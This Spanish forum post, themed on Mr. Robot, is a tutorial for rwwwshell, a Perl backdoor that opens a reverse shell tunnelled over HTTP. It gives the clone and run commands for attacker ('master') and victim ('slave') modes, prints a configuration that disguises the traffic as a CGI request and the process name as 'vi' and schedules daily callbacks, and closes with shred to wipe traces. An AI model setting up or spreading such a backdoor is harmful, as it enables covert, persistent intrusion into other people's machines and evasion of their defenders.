rwwwshell: Reviendo la infancia con Mr. Robot

Iniciado por DtxdF, Julio 06, 2019, 11:55:31 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 06, 2019, 11:55:31 AM Ultima modificación: Julio 06, 2019, 11:59:48 AM por DtxdF


rwwwshell (Reverse WWW Shell Tunnel):

Recuerdas el episodio cuando eliot deja una puerta trasera en Evil Corp pero luego tenia que desactivarla?

Para lograr esto se conecta a la maquina infectada de Evil Corp y procede a limpiar sus huellas usando el comando SHRED

Tutorial de rwwwshell:

Lo que más me costo encontrar es información acerca de esta herramienta, espero que a ustedes no le pase lo mismo. Ahora vayamos directo al grano.

Para usar rwwshell tendremos que descargarla o mejor dicho clonarla:

Código: php

git clone https://github.com/DtxdF/rwwwshell.git


Accedemos al directorio y ejecutamos:

Código: php

cd rwwwshell
perl rwwwshell-2.0.pl


Código: php
Nos aparecerá un poco de información y algo llamado "modos":




Estos modos definen básicamente quien seras en este juego, un "master" (El atacante) o un "slave" (Una victima),
Antes de ejecutar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta vamos a configurarlo:

Código: php

vim rwwwshell-2.0.pl # Lo abrimos con nuestro editor preferido
# Si nos dirigimos a la linea 24 nos damos cuenta de que aqui comienza la configuración y en la linea 53 termina!
# En mi caso yo solo configurare dos variables
$LISTEN_PORT=8080; # El puerto en escucha en caso de ser un master y para conectar en caso de ser un slave
$SERVER="127.0.0.1"; # El host que estara en escucha en caso de ser un master y el host a conectar en caso de ser un slave


Archivo de configuración completo:

Código: php

#
# GENERAL CONFIG (except for $MASK, everything must be the same
#                 for MASTER and SLAVE is this section!)
#
$MODE="POST";                    # GET or POST
$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
$MASK="vi";                      # for masking the program's process name
$PASSWORD="THC";                 # anything, nothing you have to rememeber
                                 # (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080;      # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1";    # the host to run on (ip/dns) (the SLAVE needs this!)

#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i";    # program to execute (e.g. /bin/sh)
$DELAY="3";             # time to wait for output after your command(s)
#$TIME="14:39";         # time when to connect to the master (unset if now)
#$DAILY="yes";          # tries to connect once daily if set with something
#$PROXY="127.0.0.1";    # set this with the Proxy if you must use one
#$PROXY_PORT="3128";    # set this with the Proxy Port if you must use one
#$PROXY_USER="user";    # username for proxy authentication
#$PROXY_PASSWORD="pass";# password for proxy authentication
#$DEBUG="yes";          # for debugging purpose, turn off when in production
$BROKEN_RECV="yes";     # For AIX & OpenBSD, NOT for Linux & Solaris

# END OF CONFIG         # nothing for you to do after this point #


Probando y ejecutando estilo eliot:

Código: php

perl rwwwshell-2.0.pl master # Esperamos a que se conecte la victima


Código: php

perl rwwwshell-2.0.pl slave # La victima se conecta a la maquina atacante




*Algo que no hace eliot es eliminar la puerta trasera usando el comando shred, lo que hace es cifrarlo el número de veces que le pasemos como argumento, para hacer esto tendremos que pasarle el siguiente parámetro "-u"*

- DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF